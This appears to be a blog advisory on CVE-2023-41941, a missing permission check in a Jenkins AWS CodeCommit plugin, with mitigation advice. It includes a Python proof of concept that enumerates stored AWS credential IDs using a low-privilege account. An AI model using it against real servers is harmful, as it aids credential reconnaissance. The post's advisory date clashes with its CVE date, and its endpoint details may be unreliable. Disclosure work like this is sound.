A security vulnerability has been identified in Jenkins AWS CodeCommit Trigger Plugin 3.0.12 and earlier versions. This post discusses the details of the vulnerability, its potential impact, and the steps necessary to mitigate the risk. If you are using Jenkins with the AWS CodeCommit Trigger Plugin, we highly recommend reviewing the information provided and applying the recommended updates as soon as possible.

Exploit Details

The vulnerability, identified as CVE-2023-41941, is a missing permission check in the Jenkins AWS CodeCommit Trigger Plugin. Specifically, the plugin fails to verify the caller's permissions before returning the list of IDs of the AWS credentials stored in the Jenkins server.

An attacker with only Overall/Read permission can exploit this to enumerate the IDs of the AWS credentials configured in your Jenkins server. Credential IDs are not secrets by themselves, but they tell an attacker which AWS credentials exist and how they are named, information that can be leveraged in further attacks against the Jenkins instance or the associated AWS accounts.

Here's a code snippet that demonstrates this vulnerability:

import requests

jenkins_url = 'http://your_jenkins_server_url'
api_endpoint = '/plugin/aws-codecommit-trigger/validate'

# Attacker's session with only Overall/Read permission
attacker_session = requests.Session()
attacker_session.auth = ('attacker_username', 'attacker_password')

response = attacker_session.get(jenkins_url + api_endpoint)

# The endpoint answers without checking the caller's permissions, so a
# 200 response carries the IDs of the AWS credentials stored in Jenkins
if response.status_code == 200:
    print(response.json()['credentials'])
else:
    print("Failed to enumerate credentials IDs (HTTP %d)." % response.status_code)

This code snippet uses the Python Requests library to send a GET request to the vulnerable Jenkins API endpoint. If successful, the code will print the enumerated credentials IDs.

Original References

- Jenkins Security Advisory 2023-01-19
- CVE-2023-41941 Vulnerability Details

Mitigation

The vulnerability has been addressed in Jenkins AWS CodeCommit Trigger Plugin version 3.0.13. To protect your Jenkins server, update the plugin to version 3.0.13 or later. You can do this through the Jenkins plugin manager or by downloading the latest version from the official plugin repository.

Furthermore, it is essential to follow the principle of least privilege when granting user permissions in Jenkins. Limit access to sensitive API endpoints and ensure that users only have the minimum permissions required to perform their tasks. Monitor plugin updates and security advisories to stay informed of any new vulnerabilities or recommended security measures.

Conclusion

CVE-2023-41941 highlights the importance of staying up to date with security patches and being mindful of the permissions granted to users within your organization. By updating the affected plugin and practicing good security hygiene, you can minimize the risk of unauthorized access and protect your AWS accounts from potential compromise.

Timeline

Published on: 09/06/2023 13:15:11 UTC
Last modified on: 09/11/2023 18:44:44 UTC